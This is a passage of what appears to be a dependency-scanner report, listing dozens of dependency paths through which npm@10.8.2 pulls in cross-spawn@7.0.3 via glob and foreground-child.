  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
